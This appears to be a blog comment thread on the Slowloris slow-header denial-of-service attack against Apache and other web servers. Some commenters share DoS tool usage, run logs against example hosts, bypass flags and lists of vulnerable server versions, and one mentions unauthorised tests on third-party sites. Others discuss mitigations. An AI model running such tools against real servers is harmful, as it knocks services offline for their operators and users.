    there are no quick and easy fixes. not for apkill, at least. for slowloris - lots, since its singlesourced. slowloris’s “dos” mode is easy to filter even by just doing a per-ip con limit with ipfw/ipt. apkill’s “ddos” mode … well … will just kill your apache or any other tcp service, if specially crafted for another tcp service. but any other type of ddos will kill you as well. the difference that apkill makes is that it simulates perfectly a real visitor (well… tons of them). but it can be stopped 101% with a little bit of coding “on the bright side” and with very small chances of killing real visitors (it really depends on the speed of the attack)

    anyway, i still don’t get it why is this regarded as a “bug” after all these years … even after thousands of years of being used as an exploit on humans - starvation. its not the technique that is different, but the target. all we do is to apply these kind of patterns that are deeply hidden in our perverted minds ;)

    what do i think this is?
    first its pure marketing - the simple possibility of a threat catches you - the end user - in the web. remember, remember, remember. i reloaded the cisco/microsoft dns case on slashdot comments (how they decided that this is the time-to-market for an old, already fixed bug mentioned by djb years ago) but the people are just so focused on this “new exploit” that they come blind… you are not really being threaten by anything,at least not unless you are really becoming a victim - and unless you are doing dirty business you are unlikely to become one. you are just being paranoid.
    second is “la guerre pour reconaissance” that isnt that bad as it may sound, in fact this is what drives us to discover more b.s (excuse my language)

  75. adrianilarionciobanu Says:

    Suricou(@Digg) made a nice timeline on the topic: http://digg.com/security/Apache_HTTP_DoS_tool_released

  76. RSnake Says:

    @adrianilarionciobanu - Cool, although I certainly didn’t rip off the code. This was the first I’ve heard of it and until Amit’s email I thought I was the first one to talk about it. Of course I now know that was an incorrect assumption even though we did quite a bit of research and never found another DoS tool like it in the public domain. I’d love to see a copy of his code though. In a cursory check on a few search engines I didn’t see it laying about.

  77. adrianilarionciobanu Says:

    nono, you’re missing the point. i wasn’t sure why now, why not earlier, why never. until Suricou told me about anoctopus.c and the recent IFPI/Maqs attack (that as far as i understand was linked to the piratebay case). Now i did not personally check the anoctopus.c source code to see if they used the same technique but if this is the case then my theory verifies. The exploit has no value until a big victim will arise (this case) or a big player decides its time for some other well-thought reason … and that’s when the marketing comes to do the real hack. We’re just being played here. Well there’s at least one thing that i am certain of, my paranoia is healthier than others ;)

  78. adrianilarionciobanu Says:

    if this is “the” anoctopus.c: http://ja.pastebin.ca/1439176 then it has nothing to do with the real technique: coded in a rush and it doesnt exploit fully the “capabilities” of an apache server ;) plus from what i know close() on a socket sends a FIN … this code was written by a gentleman :).

    everything related to apkill is public domain (at the url mentioned earlier somewhere above).
    if you want to test,
    0. make sure you have state-threads.sf.net , modify compile.sh and strun.sh to reflect the correct paths
    1. make sure you resolve perl deps before sucking links / generating C header
    2. dont get scared about apfinger/chinese_death compile time errors, they’re supposed to be there. chinese_death is supposed to die at runtime unless a one line fixer.
    3. some of the infos on running killap target from the webpage are mistaken - one should read some of the source code to realize whats going on. can’t just release turnkey solution or ill get to smell toilets.

    just to test that a website is vulnerable its enough to run ap_finger/chinese_death. first digs the timeout setuped on server side, second is testing if the timeout is “properly” reset when seding a small random byte quantity to the server.

    output snips (i just made sure this thing is still running cuz i didnt touch it in more than 2 years):

    localhost d # ./ap_finger www.example.com 80
    resolving timeout on connection to www.example.com:80, this may take a while depending on remote server setup
    wrote 3 bytes to net bufs, waiting on local buffers to flush … buffers flushed to net!
    waiting on remote timeout …
    error returned as expected,timeout=60 seconds, error_code=0, error_msg=”Success”

    localhost d # ./chinese_death www.example.com 80 60
    resolving timeout on connection to www.example.com:80, this may take a while depending on remote server setup
    sending 2 bytes to target, memcpy from addr 0
    timeout almost reached, write_to_net next 2 bytes SENT: “GE” at 1245533151
    sleeping 45 seconds before refreshing buffers…
    sleep_done, continue
    sending 2 bytes to target, memcpy from addr 2
    timeout almost reached, write_to_net next 2 bytes SENT: “T ” at 1245533196
    sleeping 42 seconds before refreshing buffers…
    sleep_done, continue
    sending 4 bytes to target, memcpy from addr 4
    timeout almost reached, write_to_net next 4 bytes SENT: “//wh” at 1245533238

    conclusion: example.com is vulnerable

  79. rvdh Says:

    @Roland Dobbins

    I concur with your thoughts, attacks on the TCP/IP stack is in my opinion that gets shoved under the rug, since we all know (or reasonably theoretically assume) that it’s virtually impossible to stop a denial of service attacks due to architecture and nature of how clients and servers operate. I understand the standpoint of Apache as well since it’s really tough material and it’s easy to make very bad decisions in proposing “fixes”, it’s in the same league as cryptography as far as I’m concerned, because what you fix in one place you leave open in other places, I’m sure some would propose big buffers and what not, creating new problems on top of the issues at hand. That said, I’m more concerned in crashing a kernel with lingering connections by sending a perpetual FIN-WAIT-2, something inherently insecure KeepAlive connections and yet no one talks about that, because again, you won’t solve these kind of attacks in fixing this as an individual case, since in the 9 states the TCP datagram goes through there are more theoretical attacks than I can roll my dice on. It’s like plugging holes in your boat with shotgun ammo.

    Interesting nonetheless, but at the end of the day a DOS can be accomplished on pretty much every box, with some luck with minor resources, with less luck you just resort to your resources in the old fashioned way.


  80. RSnake Says:

    Stevan Bajic helped me test and confirm that nginx in a default configuration is vulnerable as well. It required tuning the options slightly (-timeout 20 -num 3000) but it was actually a worse effect than normal and actually kept the machine down for far longer than the attack itself. It was down even minutes later.

    EDIT: nevermind - this was due to the log directory itself having been full. False positive!

  81. adrianilarionciobanu Says:

    i don’t think its a false positive. nginx is a lady and promptly resets the timer on the next byte(s) received.
    i ran a nginx with defaults few minutes ago (./nginx -p ../ where ../ is build root)

    localhost objs # HEAD http://localhost:80|grep -E ‘^Server:’
    Server: nginx/0.8.3

    cia@localhost ~/dev/d $ ./ap_finger 80
    resolving timeout on connection to, this may take a while depending on remote server setup
    wrote 2 bytes to net bufs, waiting on local buffers to flush … buffers flushed to net!
    waiting on remote timeout …
    error returned as expected,timeout=60 seconds, error_code=0, error_msg=”Success”

    cia@localhost ~/dev/d $ ./chinese_death localhost 80 60
    resolving timeout on connection to localhost:80, this may take a while depending on remote server setup
    sending 4 bytes to target, memcpy from addr 0
    timeout almost reached, write_to_net next 4 bytes SENT: “GET ” at 1245610849
    sleeping 55 seconds before refreshing buffers…
    sleep_done, continue
    sending 2 bytes to target, memcpy from addr 4
    timeout almost reached, write_to_net next 2 bytes SENT: “//” at 1245610904
    sleeping 50 seconds before refreshing buffers…
    sleep_done, continue
    sending 2 bytes to target, memcpy from addr 6
    timeout almost reached, write_to_net next 2 bytes SENT: “im” at 1245610954

  82. adrianilarionciobanu Says:

    i got tricked as well by the client_header_timeout directive.
    it seems that indeed nginx does not reset the timer but will kill the connection few seconds a little bit later on the next bytes received after the timer expired
    setting up client_header_timeout to 10 seconds allowed me to send few bytes in a 12 seconds interval but on the next sending i went bananas. not sure if the tcp stack that announced me later or the timer is checked only on the next receive but i doubt the second case.

    i apologize for spamming with a false alarm

  83. adrianilarionciobanu Says:

    sorry, i got it. its the tcp stack that tries to resend (i got some bytes still queued in the kernel buffers when that shouldnt happen unless the peer doesnt care about me, nginx prolly doesnt care to announce immediately a timeout which is nice) and the timer is respected properly. nice ;)

  84. adrianilarionciobanu Says:

    hoping that helps you, at least to confirm or question already made tests:

    nginx 0.8.3 - NOT vulnerable
    cherokee 0.99.17 - NOT vulnerable

    lighttpd 1.4.20 - vulnerable
    apache 2.2.11 - vulnerable

    im really sorry for nginx false alert. i really liked it for correctly ignoring me. cherokee made a friendly tcp annoucement that he’s gonna quit ;)

  85. adrianilarionciobanu Says:

    boa - vulnerable
    zeus - vulnerable (i was forced to test www.zeus.com. no harm done.)

  86. adrianilarionciobanu Says:

    sun web server - vulnerable (tested remote same as zeus)

    on the remote tests - not 100% assured, normally one only needs to guess the timers and then check if it is being reset “properly”. if the timers seems to be reset then normally my connection shouldnt be killed too soon even if the case of a big server load - i can assume starvation will happen. but i may be wrong.

  87. Nick Lowe Says:

    Please could you explain why you consider Squid to be vulnerable?

    I posted to their Bugzilla and got the following response:

    “Thank you for the info and pointer.

    I find it interesting that the article mentions Squid in the threaded web
    server section. They seem not to have all their facts lined up right.

    Squid does not use threads beyond the basic one every app has, and has long
    provided a number of mechanisms for protection against these types of attack.
    Parallel POSTs does seem to be a new approach to the old problem though.

    As they do mention “This also may not work if there is an upstream device that
    somehow limits/buffers/proxies HTTP requests” …such as Squid.

    If you are able to do any requests testing on current Squid we will be
    grateful. It is one of the areas lacking in test info presently.

    This issue can easily be avoided by reducing the request_timeout and
    read_timeout settings from minutes to a number of seconds. Also increasing the
    max_filedescriptors or ulimit. Operations which are routinely tuned by

  88. Nick Lowe Says:


  89. Daniel H. Says:

    Apache 2.2 Patch witch works :

    This patch is available under the following URL: http://synflood.at/tmp/anti-slowloris.diff.

    Testet Aganst Apache 2.2.10 on a gentoo system.

  90. JY Says:

    @Daniel H.
    The link you provided doesn’t work.

  91. adrianilarionciobanu Says:

    @JY: delete the ‘.’ at the end

  92. adrianilarionciobanu Says:

    @Nick Lowe:
    squid - NOT vulnerable
    i just tested it

  93. adrianilarionciobanu Says:

    anyway i think testing http services is useless and will just piss off people. can’t really blame for example apache for being … politically correct as i commented on

  94. adrianilarionciobanu Says:

    fingerprinting and vulnerability test available for download (as were done in 2007, output a little bit beautified and dropped the compile time errors - useless now)


    the ddos tool not cleanedup but still avail from old url

  95. RSnake Says:

    @All - I will get to squid in a bit but I wanted to update regarding the MPM Event module: http://httpd.apache.org/docs/2.2/mod/event.html

    So we installed it (we already had worker installed but not event). And it worked as advertised - sorta. Once we set Slowloris to -timeout 10 -num 7000 the test site went up and down frequently. So if you can get over the fact that it is “experimental, so it may or may not work as expected” and the fact that “MPM is incompatible with mod_ssl, and other input filters” and the fact that it’s still vulnerable but recovers occasionally… it’s a pretty good module at keeping your site up some of the time.

    IIS on the other hand still has no problems with that same configuration in Slowloris. I still believe IIS has a better model than mpm_event_module.

  96. adrianilarionciobanu Says:

    event is for keepalives as far as i know but you can still maxout the fdmax or if you run for cgis would be easier. as for worker mpm - the policy is the same as for preforks, isnt it? re, timeouts - being reset the same way on first byte received. you just have to reach maxthreads instead of maxprocs now.

  97. S. Says:

    FYI: I made some tests slowloris on some WAF(based on apache) and it failed too.
    Let the sun shine !

  98. RSnake Says:

    @All - Good writeup on stopping Slowloris with Cisco’s CSS:

    @S. - Which WAF broke? That’s interesting!

  99. hanabokuro Says:

    I think “AcceptFilter http httpready” will protect from slowloris if your OS is FreeBSD.
    Linux doesn’t support accf_http kernel module.

  100. S. Says:

    @rsnake: drop me an email to have explanation first

  101. Robert A Says:


  102. RSnake Says:

    @hanabokuro - yes, try the -httpready switch in Slowloris to get around accf_http (also known as HTTPReady).

  103. John Terrill Says:

    There has been far too much media coverage of this attack.

    We have known about this issue for a long time which is why a number of load balancers and scalable infrastructures work the way they do. I mean, its text book denial of service… Not to mention that commercial sites at a high risk to these types of attacks have already implemented protections and monitor traffic well enough that they would just block connections fitting the types of traffic patterns.

    Another thing that seems to be exaggerated here is how impactful this attack is. Its not like taking down a web server nets you much. Where is the access to trusted resources or ability to run arbitrary code?

    Now there are outrageous accusations like Iran stating that CNN is trying to teach people how to take down their web servers(http://edition.cnn.com/2009/WORLD/meast/06/22/cnn.iran.claim/index.html). This could have been played very differently and explained more responsibly when explaining the actual risk.

    When discussing the media attention surrounding this DoS POC - to quote Family Guy, “this makes about as much sense as Beowulf having sex with Robert Fulton at the First Battle of Antietam”.

  104. hanabokuro Says:

    @rsnake - thank info.
    hmm. accf_http only work with GET & HEAD.
    Why accf_http doesn’t support POST or other request ?

    I tested lighttpd. lighttpd is vulnerable.
    lighttped has max connection limit. It depend on FD_SETSIZE(max number of file descripter per process).
    lighttped use one fd for connection to client and use one fd for read HTML file.
    So. ligttpd’s max connection limit is FD_SETSIZE(default is 1024) / 2.

    ’slowloris.pl -num 600′ can do DOS against lighttpd.

  105. hanabokuro Says:

    I tested lighttpd again.
    “server.max-worker” config setting worked well.
    lighttpd can handle (FD_SETSIZE / 2) * “server.max-worker” connections.
    lighttpd is still vulnerable. but become little harder to do DOS.
    Attacker need to more connection to do DOS. it mean easy to detect attack.

    I’ll change my server to “lightttpd(reverse proxy mode) apache”
    with “sever.max-work = 256″ at lighttpd.conf and “MaxClients 256″.

  106. RSnake Says:

    @John Terrill - Surely you aren’t claiming that I am somehow to blame for Iran’s distaste for CNN’s coverage of an DDoS attack (not DoS) that pre-dates my release of the tool by nearly a week, right? That’s a bit of a stretch. And if it’s a textbook DoS attack, how is this tool any more of an issue than we had before? If you’re simply saying it shouldn’t have gotten news coverage, you and I are in agreement. Although I will disagree with your assessment that DoS gives you nothing - please read the two other blog posts on this site regarding DoS over the past month.

    I just want Apache to fix their problem. A problem that you rightly said has been fixed by other inline devices and webservers for eons - but not by Apache. I wouldn’t have released Slowloris at all if Apache had given me more than a 20 word response indicating that they even cared, or had a reasonable fix forthcoming. I have a feeling the Apache guys are taking their disclosure cues from their Google brethren - it smacks of the same holier than though entitlement BS, instead of willingness to cooperate and work with the user community and admitting that that have problems. Instead they’re happy enough to pass the blame onto the network for not compensating for their architectural issues and saying it’s old news and fixed by a module that doesn’t fix the problem (and breaks other stuff in the process). That’s a much easier fix than actually fixing it, isn’t it?

    Incidentally, if anyone can find a link to the original article that Iran is upset about, I’d be curious to read it.

  107. RSnake Says:

    @All - just got word of mod_antiloris http://hmnet.nl/mod_antiloris-0.1.zip We have not evaluated it yet, and may not have time to today. Comments welcome.

  108. adrianilarionciobanu Says:

    @John Terril : I totally agree with you. If someone can start a war these days then the name is media. Anyway, the original article was meant to proove the exact opposite: that (some of the) companies that promise protection against dos/ddos are b.s.-ing the customers. And now … it is indeed an exaggeration for the sake of the effect - meant to hit the lines. The worst thing is that only few people see that …

  109. adrianilarionciobanu Says:

    So if someone (lets say the dude that started it) can stop this circus some people would be grateful. There’s no bug, there is no flaw. Understand that. Its just a way to exploit friendly neighbours. Like in our daily lives.

  110. adrianilarionciobanu Says:

    … and @RSnake: if I would be an apache developer to take the decision on this then there would be no fix. Same for any other services marked as vulnerable. vulnerability does not always translate into a bug. If i am going to have my teeth spread all over the parking lot because of some incident with the gangs, for being too friendly and for not wearing a football helmet … well …

    my question is this: WHERE do you see a bug in apache? it does it right. nginx doesnt (for example, nor cherokee and that saved their butter) but these days the right thing is the wrong thing and the wrong thing is the right thing. apache did enough by implementing accept filters. its true that accf_http will do more harm than good if ddosed and that doesnt support POST but think of what POST is (as length) but one can write another filter.
    i believe that if someone (like apache) will act on this and “fix” it - that will be a mistake.

  111. adrianilarionciobanu Says:

    mod_antiloris - definetely not fixing the problem. i read the source code.

    i must explain the problem:

    1. there is a Timeout setting that should define how long should a connection be kept open while trying to receive the full request from client
    2. if the Timeout is 30 seconds but i keep sending one byte just one second before the timer expires, the timer is going to be reset. that will allow me to keep the connection open indefinitely long.

    fixing the problem:

    1. don’t reset the timer, it should be kept the same until the full request is received. so let it go low. keep a header_read_timeout and a post_read_Timeout eventually (but i didnt give it too much of a thought here)
    2. if a new connection should be accepted but there is no open slot then the connection manager should close the oldest incomplete request to make room for the new one. CARE TO BE TAKEN with post requests where “the oldest” isnt the best candidate if the post data len is huge…. this should be OK TO IMPLEMENT because most of the http requests headers sent on most of the internet lines should FIT into one ip datagram.

    this is an ethical problem and that is why i am saying apache should do nothing. what if there are REAL slow clients, or congestions? it will not be fair to kill the weakest. thats why a sysadmin should take a decision locally either to doit or not.

  112. RSnake Says:

    @adrianilarionciobanu - The flaw is that they don’t use a worker pool model. Apache believes you should use resources even though the resources aren’t being used. IIS believes you should use resources only if they need to be used. A one-thread-per-user model isn’t acceptable. accf_http should be fixed, yes, but if it’s not a default install fix, then tons of things will continue to be DoSable. The alternative is that they fix it by using a similar worker pool model and make it default. Forget timeouts, that’s a hokey solution.

  113. adrianilarionciobanu Says:

    @RSnake :

    - what do you mean forget timeouts? this is the core of the problem (if we all want to have a problem). or its just your personal war against apache-dev ignorance? what about lighttpd and others? ;)
    - what do you mean they don’t use a worker pool model? i always thought the “worker” and “prefork” are managed in pools. in fact many of the things in apache are pools. they may lie in documentation but not in the source code ;)
    - what do you mean by “a one-thread-per-user model isn’t acceptable”? think CGI. and think embedded scripting in general, one blocking i/o operation or one cpu-intensive operation would hurt. they have event module for static resources / keep-alive connections.

    what do you want, apache redesign against a dos tool (that can eventually be reused for nice ddosing) ? either the case … let’s get all real.

    this is starting to look like only don quixote may really fix it.

  114. RSnake Says:

    @adrianilarionciobanu - You’re exactly right, CGIs that block have the same problems. Worker pools do not - where there is a pool of resources and only those who need those resources get them - a slow connection doesn’t need them until it starts communicating again. Apache does need a re-design or a default module that handles that same task for them. I don’t know enough about lighttpd or the others to tell how they should be fixed, but Apache blocks new processes from forking because it waits. By reducing the timeout you are only hurting legitimate users like you said.

    I don’t think reducing timeouts is the solution (which is why I said forget them). I think Apache’s one-thread-per-connection model is the problem - which is what Event MPM promised to fix but didn’t deliver, or at least not well.

  115. adrianilarionciobanu Says:

    I’M NOT SAYING to reduce the timeouts, I’m saying RESPECT THEM. i never said lowering the timeout is the solution i said NOT TO RESET the timer when a byte feeds the connection but leave it installed as it was when the connection was initiated.

    CGIs and scripts in general are not apache’s problem - those are user’s problem.

    you want one single event-based thread to do the connection management and deliver only fully http-setuped connections to the workers pool? do that. i think the current design gives you the power to install your own module in any stage you want … many others have solved the problem the same way or in a different way, outside the apache (which i consider safer). apache wasn’t meant to be a HTTP fortress but a good framework on which others will build their applications based on their needs. really …

  116. RSnake Says:

    @adrianilarionciobanu - I understand and respect your opinion. I, however, don’t think it should be up to webmasters to have to write/install their own modules to do something that other webservers do automatically to protect you. But that’s just my opinion. In the same way I don’t think people should have to jump through a billion hoops to protect themselves online - the reason being they don’t know how most of the time and even if they do, they still don’t manage to do it completely right. Everyone would be better off if it just worked “correctly”.

    I agree about CGI scripts being the user’s problem because they wrote it. Just like Apache is Apache’s problem because they wrote it.

    Anyway, this is only a vaguely interesting conversation and outside of the scope of this thread. The real question is how to fix Apache, not how to do we install another inline device.

  117. adrianilarionciobanu Says:

    with your connections-manager-event-based-single-thread model and without “fixing” the timeout-reset you will have the same problem. i will starve you of file descriptors to death. you will keep installing event listeners and eat one byte at Timeout-1 seconds on sockets until you are fully dead. lighttpd is event-based, isn’t?

  118. RSnake Says:

    @adrianilarionciobanu - possibly, you could be right. I can’t speak to lighttpd, but I haven’t yet been unable to cause your scenario to occur on IIS. But maybe the attack will work differently in that model. I’d be curious to see some sample code that does what you’re describing.

  119. Mike Adewole Says:

    (This was meant to be posted here but I mistakenly posted it elsewhere :)

    Well, it is in fact an architectural problem in Apache with possible solutions described at http://www.codexon.com/posts/defending-against-the-new-dos-tool-slowloris.

    Now, whether Apache should fix it or not is their problem. But the solution is pretty simple: they need to (a) implement a per-client backlog request queue similar to the backlog parameter that is passed to the listen socket api, and (b) they need to read a client’s requests one at a time from the client’s backlog queue. When the queue fills up, requests from the same client or ip address are temporarily rejected.

    Yes, this does mean that an attacker on say AOL can deny access to other AOL users but (1) that’s only possible if the attacker can busy-wait every ip address in the AOL proxy pool, and (2) should that happen, the problem will be AOL’s rather than Apache’s.

    For another reason why reverse proxy on AOL’s scale is AOL’s problem and no one else’s, see http://botsosphere.blogspot.com/2007/08/reverse-proxies-are-menace-to-web.html

  120. adrianilarionciobanu Says:

    im tired to publish the link of ddos tool. this is a vuln tester only. nobody pays attention, including you. it was my first post that i wrote the link to the tools (vul test + ddos tool).

  121. hanabokuro Says:

    I’v wrote a module.

    It based on mod_antiloris, mod_limitipconn and mod_extfilter.
    sorry, no document yet.

  122. Changlinn Says:

    I am surprised IIS isn’t vulnerable to this, IIS is threaded at least can be, the only thing I can think that may protect it is its tcp/ip connection limit.

  123. kai Says:

    WAF Phion Airlock will crash. The Backend Webservers feel fine :-)
    Tomorrow we’ll test F5 BIG IP

  124. adrianilarionciobanu Says:

    i updated http://pub.mud.ro/~cia/files/deadsnail/ to include a dos version of what was the ddos tool 2 years ago.
    so now you have 3 tools, one for fingerprinting, one for vulnerability check and one to dos yourself til blood comes out of your years. i removed all the ddos code for obvious reasons.
    you’ll have to read the page first if you want to reach the nirvana by running killit

  125. adrianilarionciobanu Says:

    to zombify lighttpd i ran a default lighttpd config with a timeout lowered to 60 seconds
    on the other side killit was called with
    ./killit localhost 80 60 4096. in this scenario altho i was able to connect with nc to lighttpd i didnt got served. i had no idea what the fd limit was.

    if lighttpd wouldnt be vulnerable to timeout-reset then this wouldnt happen. picture this in a ddos attack as a dos like this would be easy to make it go.

    i wouldnt go too much further with the apache-war hat you’re wearing now.

  126. adrianilarionciobanu Says:

    @RSnake: anyway, i understand what you want from apache. there were many that tried before to change something in better but everything was denied (i know at least two cases). and you will have no luck even if you would be 100% right and sustained by community and everything else. apache is one of the brontosaurs that survived. the same as bind. and bind sucks much more than apache and it is much more easy to exploit … but it works. it is backedup up by tons of clusters and load balancers and it works. other users use djbdns. they realized that they don’t need so many pairs of pink panties just because bind shites on it too often so they traded it for one pair of white panties. the same user can just drop apache and go nginx which seems to be a real candidate and i think the webmaster community should give it a stronger hand. or any other good candidate. cherokee maybe, i dont know. that if apache smells so brownish for them.

  127. nicola Says:

    @ Rsnake Best way isn’t improving apache , I’m absolutely agree with adrianilarionciobanu .
    If other webserver offers more , why not use instead of apache?
    There isn’t a bug , IMHO .
    However as always excellent work Robert :)

  128. nicola Says:

    IIS at the end isn’t vulnerable for connection limit , but can try by default .

    I think if you want to use apache you have to patch manually tot improve the security , and if you know how is a way , but if not can simple try other webserver more supported and ( as you said ) less old .
    Nobody forces to use apache . It’s very simple . I agree with you .
    Ah , thanks for tools sharing .

  129. Willy Says:

    I have put a config here to help Apache users protect their servers by simply moving apache to another port and installing haproxy in front of it. Haproxy doesn’t suffer from the apache model’s limitations and can easily sustain tens of thousands of concurrent connections, as well as enforce a timeout on the http request regardless of the server’s response time. Since a lot of people are downloading the config, I thought I should post it here too.


  130. Willy Says:

    Oh BTW, you can add haproxy to the non-vulnerable list (tested).

  131. Julius B. Thijssen Says:

    Most recent linux server distributions have the connlimit module in iptables, in which case they can simply use something like:

    # /sbin/iptables -A INPUT -p tcp –syn –dport 80:443 -m connlimit –connlimit-above 12 –connlimit-mask 24 -j REJECT

    or even

    # /sbin/iptables -A INPUT -p tcp –syn –dport 80:443 -m connlimit –connlimit-above 12 –connlimit-mask 24 -j DROP

    if you don’t want to be bothered by a busy line upwards.

  132. id Says:

    @Julius B, While that may stop Slowloris, it will also let me DoS your clients with spoofed SYN packets.

  133. nimda Says:

    to zombify lighttpd i ran a default lighttpd config with a timeout lowered to 60 seconds
    on the other side killit was called with
    ./killit localhost 80 60 4096. in this scenario altho i was able to connect with nc to lighttpd i didnt got served. i had no idea what the fd limit was.

    if lighttpd wouldnt be vulnerable to timeout-reset then this wouldnt happen. picture this in a ddos attack as a dos like this would be easy to make it go..

    i wouldnt go too much further with the apache-war hat you’re wearing now.

  134. Marcus Spiegel Says:

    mod_qos together with mod_antiloris did the trick for me… best directive used by mod_qos probably is:

    # minimum request/response speed
    QS_SrvMinDataRate 150 1200

    (deny slow clients blocking the server, ie. slowloris keeping connections open without requesting anything)

    so apache still keeps up responding while getting attacked. I just published a quick howto: http://www.howtoforge.com/node/4644 how mod_qos helped me.

  135. hopefull Says:

    here is a couple of interesting links:



    …i think, anyway

  136. burmese Says:

    With slowloris tool released, hundreds of hosting providers are now implementing mitigation factors. This is very good response. Or else they didn’t even know they’re vulnerable. Good work, RSnake.

  137. passing-by-anon Says:

    shame on you, apache.
    your willful ignorance had to be punished.

  138. Stephan Edelman Says:

    The argument whether this is the Apache Group’s problem or not is irrelevant, Slowloris is able to bring our apache servers to its knees with our customers complaining about extremely slow web responses. We run several e-commerce websites for commercial clients that are loosing real dollars because of this vulnerability.

    Although the IPTABLES solution proposed by Mr. Thijssen will do the trick, I believe the mod_qos provides for the real solution at the application level (where the problem resides) so we’re going to try it out and we’ll report back.

  139. mrbig4545 Says:

    @RSnake, good code, I like it! Also, its finally motivated me to finish my code and migrate it away from apache, I’m thinking Cherokee, so thanks for that!

  140. Nico Golde Says:

    YFYI, Debian unstable now comes with an apache module to mitigate this:
    http://packages.debian.org/sid/libapache2-mod-antiloris which basically let’s you configure the maximum number of simultaneous connections in read state on a per IP basis. I didn’t try it yet though.

  141. Nico Golde Says:

    hmm ok this fixes the 1 script n connections problem and effectivley your PoC but the general attack vector via a small network performing this distributed is still open :/

  142. kik Says:

    Even if this post is a bit old, I think this worth mentions it. Today, the github blog features a webserver project based on erlang and called yaws : http://github.com/klacke/yaws .

    Ali Ghodsi and Joe Armstrong benchmarked its concurency requests versus apache : http://www.sics.se/~joe/apachevsyaws.html .

    I thought you may be interested in it.

  143. habbatussaudaaa Says:

    slowloris is the bestttttttttttt